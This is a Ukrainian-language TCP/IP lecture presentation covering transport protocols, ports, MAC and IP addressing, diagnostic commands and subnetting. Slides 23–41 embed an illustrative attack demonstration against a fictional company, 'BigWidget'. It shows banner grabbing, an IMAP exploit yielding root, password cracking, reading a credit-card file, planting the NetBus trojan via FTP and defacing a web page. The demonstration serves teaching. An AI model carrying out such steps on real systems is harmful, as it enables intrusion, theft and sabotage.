Разделы презентаций
- Разное
- Английский язык
- Астрономия
- Алгебра
- Биология
- География
- Геометрия
- Детские презентации
- Информатика
- История
- Литература
- Математика
- Медицина
- Менеджмент
- Музыка
- МХК
- Немецкий язык
- ОБЖ
- Обществознание
- Окружающий мир
- Педагогика
- Русский язык
- Технология
- Физика
- Философия
- Химия
- Шаблоны, картинки для презентаций
- Экология
- Экономика
- Юриспруденция
Протоколи ТСР і ІР
Содержание
- 1. Протоколи ТСР і ІР
- 2. Навчальні питанняПротокол управління передачею – ТСР (Transmission Control Protocol).Протокол IP. Підмережі.
- 3. Розробники ТСР/ІР Винт СерфРоберт КанПротокол передачі
- 4. 1. Протокол управління передачею – ТСРTransmission Control Protocol
- 5. Місце протоколівРівень додатківРівень транспортнийРівень ІнтернетРівень доступу
- 6. Місце транспортного рівня
- 7. Мультиплексування – одночасна передача сегментів різних програмних
- 8. Сегментація і мультиплексування
- 9. Задачі транспортного рівняВідстеження окремих зв'язків між програмами
- 10. Протоколи транспортного рівняПротокол, що встановлює з'єднання(connection-oriented)Перед початком
- 11. Вибір протоколу транспортного рівняПротокол ТСРПротокол UDРВибір протоколу здійснюється в залежності від вимог додатку
- 12. Протоколи транспортного рівня
- 13. Реалізується за допомогою засобу, що має назву
- 14. Групи портів ТСР/UDP
- 15. Слайд 15
- 16. Під час передачі деякі ІР-пакети можуть бути
- 17. Задачі протоколу ТСР- встановлення сесії зв'язку- надійність
- 18. Слайд 18
- 19. Питання
- 20. Слайд 20
- 21. bigwidget.com
- 22. Слайд 22
- 23. ~$ telnet bigwidget.com 25Trying 10.0.0.28...Connected to bigwidget.comEscape
- 24. imap
- 25. imap
- 26. Слайд 26
- 27. hacker ~$./imap_exploit bigwidget.comIMAP Exploit for Linux.Author: Akylonius
- 28. Allan B. Smith 6543-2223-1209-4002 12/99Donna D.
- 29. Слайд 29
- 30. Слайд 30
- 31. ftp>cd \temp250 CDW command successful.ftp>send netbus.exelocal: netbus.exe
- 32. Слайд 32
- 33. ИНФОРМЗАЩИТАНАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕСеть компании BigWidgetUNIXFirewallE-Mail серверWeb серверRouterNTРабочие станциисетьUNIXNTUNIXПример осуществления атаки
- 34. Слайд 34
- 35. Слайд 35
- 36. Слайд 36
- 37. Слайд 37
- 38. Слайд 38
- 39. c:\>ftp webcentralConnected to webcentral220 webcentral Microsoft FTP
- 40. Слайд 40
- 41. ИНФОРМЗАЩИТАНАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕUNIXFirewallE-Mail серверWeb серверRouterNTРабочие станцииСетьUNIXNTUNIXСеть компании BigWidgetПример осуществления атаки
- 42. 2. Протокол ІР. Підмережі
- 43. 2.1. Адресація в IP-мережах.
- 44. Адреса комп'ютеру Кожен комп'ютер у IP-мережі має адреси трьох рівнів:локальну адресу (МАС-адресу)мережну адресу (ІР-адреса)домене ім'я (www.hp.com)
- 45. 1 рівень: МАС-адресаЛокальна адреса вузла. Для вузлів,
- 46. МАС-адресаПризначаються виробниками мережного устаткування і є унікальною.
- 47. МАС-адресаПереглянуть МАС-адресу комп'ютеру можна за допомогою команди ipconfig
- 48. МАС-адреса
- 49. 2 рівень: ІР-адресаДовжина 4 байта = 32
- 50. Ipconfig
- 51. Ipconfig /all
- 52. Ping
- 53. Ping -t
- 54. Ping -l
- 55. Ping -n
- 56. Tracert
- 57. Tracert
- 58. PathPing
- 59. JPerf
- 60. Tracert
- 61. Слайд 61
- 62. Слайд 62
- 63. Маска підмережіМаска – число, що використовується разом
- 64. ПідмережіДо введення маски було 2 градації адресування:
- 65. Слайд 65
- 66. Слайд 66
- 67. Завдання192.168.0.62/27 192.168.0.65/27 комутаторабомаршрутизатор
- 68. Слайд 68
- 69. Слайд 69
- 70. Вправа172.16.2.131/28ІР-адреса ПКswitchІР-адреса мережі
- 71. ВисновкиТранспортний рівень займає проміжне положення між рівнем
- 72. Незабаром IP-адреса закінчатьсяКогда Винт Серф вместе с
- 73. Скачать презентанцию
Навчальні питанняПротокол управління передачею – ТСР (Transmission Control Protocol).Протокол IP. Підмережі.
Слайды и текст этой презентации
Слайд 2Навчальні питання
Протокол управління передачею – ТСР (Transmission Control Protocol).
Протокол IP.
Підмережі.
Слайд 3Розробники ТСР/ІР
Винт Серф
Роберт Кан
Протокол передачі даних TCP/IP був
розроблений Винтом Серфом. У 1974 році, в період роботи в
Стенфордському університеті, разом з Робертом Каном він опублікував статтю "A Protocol for Packet Network Intercommunication" ("Протокол для пакетної міжмережевої комунікації"), в якій був описаний протокол передачі даних TCP (transmission-control protocol), що дозволяє передавати дані між різними мережами.У 1976 році Серф перейшов на роботу в Агентство передових оборонних дослідницьких проектів (DARPA, Defense Advanced Research Projects Agency) міністерства оборони США. У цьому агентстві Серф разом з Каном займався розробкою технологій передачі пакетів даних і безпекою.
За його участю в 1978 році розроблений раніше протокол передачі даних був поділений на дві частини - TCP і IP (Internet protocol). В результаті з'явився стек протоколів TCP/IP, який до цього дня є стандартом для передачі даних в Інтернеті.
Слайд 7Мультиплексування – одночасна передача сегментів різних програмних додатків від різних
користувачів через мережу.
Який може бути максимальний розмір сегменту?
Якщо сегменти утворюються
різними додатками, те яку задачу необхідно буде вирішити при їх передачі?Функції транспортного рівня
Сегментування даних
Мультиплексування
Сегментування – процес розподілу даних, що призначені для передачі, на невеликі більш керовані частини.
Максимальний розмір сегменту залежіть від максимальної довжини фрейму канального рівня.
На даний час для передачі даних на канальному рівні основним протоколом є Ethernet.
Слайд 9Задачі транспортного рівня
Відстеження окремих зв'язків між програмами на комп'ютері відправника
і одержувача
Сегментація даних на комп'ютері відправника і управління передачею кожної
частиниЗборка прийнятої інформації у потоки даних додатків на комп'ютері одержувача
Визначення різних додатків
Слайд 10Протоколи транспортного рівня
Протокол, що встановлює з'єднання
(connection-oriented)
Перед початком передачі інформації даному
протоколу необхідний обмін службовими повідомленнями між вузлами мережі
Transmission Control Protocol
(TCP)
- протокол управління передачеюПротокол без встановлення з'єднання
(connectionless)
Перед початком передачі інформації даний протокол не вимагає обміну службовими повідомленнями між вузлами мережі
User Datagram Protocol (UDP)
- протокол користувальницьких дейтаграм
Слайд 11Вибір протоколу транспортного рівня
Протокол ТСР
Протокол UDР
Вибір протоколу здійснюється в залежності
від вимог додатку
Слайд 13Реалізується за допомогою засобу, що має назву - сокету (socket).
Сокети дозволяють встановлювати зв'язок між прикладними програмами, яки одночасно працюють
на різних вузлах мережі.Сокет складається з назви протоколу, ІР-адреси вузла і номеру порту:
ТСР, 192.168.0.101:80
Порт є засобом, що дозволяє ідентифікувати додаток вузла, якому призначені одержані дані
Кількість портів складає 65536, тобто теоретично така кількість процесів (прикладних програм), запущених на одному ПК, може одночасно здійснювати обмін даними.
Мультиплексування
Слайд 16Під час передачі деякі ІР-пакети можуть бути втрачені або перекручені
(пошкоджені) завадами, що виникають у каналах зв'язку.
Тому одна з
функцій транспортного рівня, що реалізується протоколом ТСР – відновлення даних.В залежності від умов передачі, кількість даних, що передаються від серверу до клієнта може змінюватися.
Тобто об'єм даних, що передаються постійно адаптується до стану каналу – це інша функція протоколу ТСР.
Функції протоколу ТСР
Відновлення даних
Керування потоком
Слайд 17
Задачі протоколу ТСР
- встановлення сесії зв'язку
- надійність передачі
даних
- зборка
прийнятих даних у
правильному порядку
управління потоком
передачі
Слайд 23~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com
Escape character is '^]'.
hacker:
hacker:~$
Connection
closed by foreign host.
telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
*
OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)(Report problems in this server to MRC@CAC.Washington.EDU)
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.
![~$ telnet bigwidget.com 25Trying 10.0.0.28...Connected to bigwidget.comEscape character is '^]'.hacker:hacker:~$Connection closed by foreign host.telnet bigwidget.com 143Trying 10.0.0.28...Connected](/img/thumbs/55c0ddbfb242b7749a912ee67a60c7b0-800x.jpg "Протоколи ТСР і ІР ~$ telnet bigwidget.com 25Trying 10.0.0.28...Connected to bigwidget.comEscape character is '^]'.hacker:hacker:~$Connection closed")
Слайд 27hacker ~$
./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius (aky@galeb.etf.bg.ac.yu)
Modifications: p1 (p1@el8.org)
Completed
successfully.
hacker ~$
telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2
(Biltmore)Kernel 2.0.35 on an i686
root
bigwidget:~#
whoami
root
bigwidget:~#
cat ./hosts
127.0.0.1 localhost localhost.localdomain
208.21.2.10 thevault accounting
208.21.2.11 fasttalk sales
208.21.2.12 geekspeak engineering
208.21.2.13 people human resources
208.21.2.14 thelinks marketing
208.21.2.15 thesource information systems
bigwidget:~#
cd /etc
bigwidget:~#
rlogin thevault
login:
Слайд 28Allan B. Smith 6543-2223-1209-4002 12/99
Donna D. Smith 6543-4133-0632-4572
06/98
Jim Smith 6543-2344-1523-5522 01/01
Joseph L.Smith 6543-2356-1882-7532
04/02Kay L. Smith 6543-2398-1972-4532 06/03
Mary Ann Smith 6543-8933-1332-4222 05/01
Robert F. Smith 6543-0133-5232-3332 05/99
thevault:~#
cat visa.txt
cd /data/creditcards
thevault:~#
thevault:~#
crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambob
username: mary password: mary
username: root password: ncc1701
thevault:~#
ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name:
administrator
331 Password required for administrator.
Password:
*******
230 User administrator logged in.
Remote system type is Windows_NT.
Слайд 31ftp>
cd \temp
250 CDW command successful.
ftp>
send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT
command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer
complete.ftp>
ftp>
quit
thevault:~$
telnet thesource
Trying 208.21.2.160.
.. Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login:
administrator
password:
*******
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\>
cd \temp
C:\TEMP>
netbus.exe
Слайд 33ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ
Сеть компании BigWidget
UNIX
Firewall
E-Mail сервер
Web сервер
Router
NT
Рабочие станции
сеть
UNIX
NT
UNIX
Пример осуществления атаки
Слайд 39c:\>
ftp webcentral
Connected to webcentral
220 webcentral Microsoft FTP Service (Version 4.0).
Name:
jsmith
331
Password required for jsmith.
Password:
*******
230 User jsmith logged in.
Remote system type
is Windows_NT.ftp>
send index.html
local: bigwedgie.html remote: index.html
200 PORT command successful.
150 Opening BINARY mode data connection for index.html
226 Transfer complete.
ftp>
ftp>
quit
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 jsmith jsmith 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root root 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 jsmith jsmith 2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 jsmith jsmith 1244 Aug 17 17:07 image1.gif
-rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif
-rwxr-x--x 6 jsmith jsmith 877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 jsmith jsmith 1314 Aug 17 17:07 bigwidget.jpg
-rwxr-xr-x 2 jsmith jsmith 1824 Aug 17 17:07 page2.html
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)
ftp>
dir
Слайд 41ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ
UNIX
Firewall
E-Mail сервер
Web сервер
Router
NT
Рабочие станции
Сеть
UNIX
NT
UNIX
Сеть компании BigWidget
Пример осуществления атаки
Слайд 44Адреса комп'ютеру
Кожен комп'ютер у IP-мережі має адреси трьох рівнів:
локальну
адресу (МАС-адресу)
мережну адресу (ІР-адреса)
домене ім'я (www.hp.com)
Слайд 451 рівень: МАС-адреса
Локальна адреса вузла. Для вузлів, що входять у
локальні мережі - це МАС-адреса мережного адаптера чи порту маршрутизатора.
Приклад: 11-А0-17-3D-BC-01.(MAC – media access control – підрівень доступу до середовища передачі канального рівня моделі OSI).
Слайд 46МАС-адреса
Призначаються виробниками мережного устаткування і є унікальною.
Використовується на канальному
рівні тобто на рівні локальних мереж.
6 байтів
Слайд 492 рівень: ІР-адреса
Довжина 4 байта = 32 біта.
Ця адреса
використовується на мережному рівні, тобто на рівні, що забезпечує передачу
даних між локальними мережами.Вона призначається адміністратором мережі під час налаштування мережного адаптеру комп'ютеру (або надається автоматично), а також призначається кожному порту маршрутизатора.
109
26
17
100
109.26.17.100
Слайд 63Маска підмережі
Маска – число, що використовується разом з ІР-адресою. Двійковий
запис маски має одиниці у розрядах, що в ІР-адресі відповідають
номеру мережі.Мережевий префікс
255.0.0.0 - /8
255.255.0.0 - /16
255.255.255.0 - /24
Слайд 64Підмережі
До введення маски було 2 градації адресування: мережа і номер
комп’ютеру у даній мережі
Введення маски створює 3 градації адресування: мережа,
підмережа і номер комп’ютеру у даній підмережі№ мережі
№ ПК
№ мережі
№ ПК
№ підмережі
І
ІІ
ІІ
І
ІІІ
Слайд 71Висновки
Транспортний рівень займає проміжне положення між рівнем додатків і рівнем
Інтернет у моделі ТСР/ІР.
Головні функції, що виконуються транспортним рівнем –
сегментування і мультиплексуванняСвої функції транспортний рівень виконує за допомогою протоколів ТСР і UDP
Протокол ТСР забезпечує гарантовану доставку сегментів через мережу. Перевагою протоколу UDP є більш швидка передача і менше навантаження на мережу.
Слайд 72Незабаром IP-адреса закінчаться
Когда Винт Серф вместе с другими специалистами заложил
основу интернета в 1977 году, он ввел "интернет-протокол четвертой версии"
(IPv4), который мог обеспечить 4,2 млрд адресов. Однако число устройств с доступом в интернет, особенно мобильных телефонов, возрастает, и теперь свободны лишь 14% этих адресов.По оценкам, адреса IPv4, каждый из которых представляет собой ряд из 32 двоичных символов, закончатся к 2010 году.
Новая система, названная IPv6, готова к внедрению уже больше десятилетия.
В системе IPv6 каждый адрес записывается 128 битами, что позволяет присвоить 340 триллионов триллионов триллионов различных адресов – это 340.000.000.000.000.000.000.000.000.000.000.000.000. Как ожидается, это должно удовлетворить потребности человечества на несколько десятилетий вперед.
http://podrobnosti.ua/internet/2008/09/26/557254.html
Винт Серф
